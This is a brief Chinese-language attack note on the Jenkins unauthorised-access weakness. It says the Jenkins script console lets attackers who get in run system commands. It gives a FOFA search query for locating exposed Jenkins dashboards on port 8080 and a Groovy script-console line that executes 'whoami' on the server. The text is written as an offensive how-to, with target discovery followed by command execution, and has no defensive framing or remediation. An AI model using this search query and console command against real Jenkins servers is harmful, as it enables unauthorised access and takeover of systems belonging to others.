Jenkins未授权访问漏洞

Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

一、使用以下fofa语法进行产品搜索

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

println "whoami".execute().text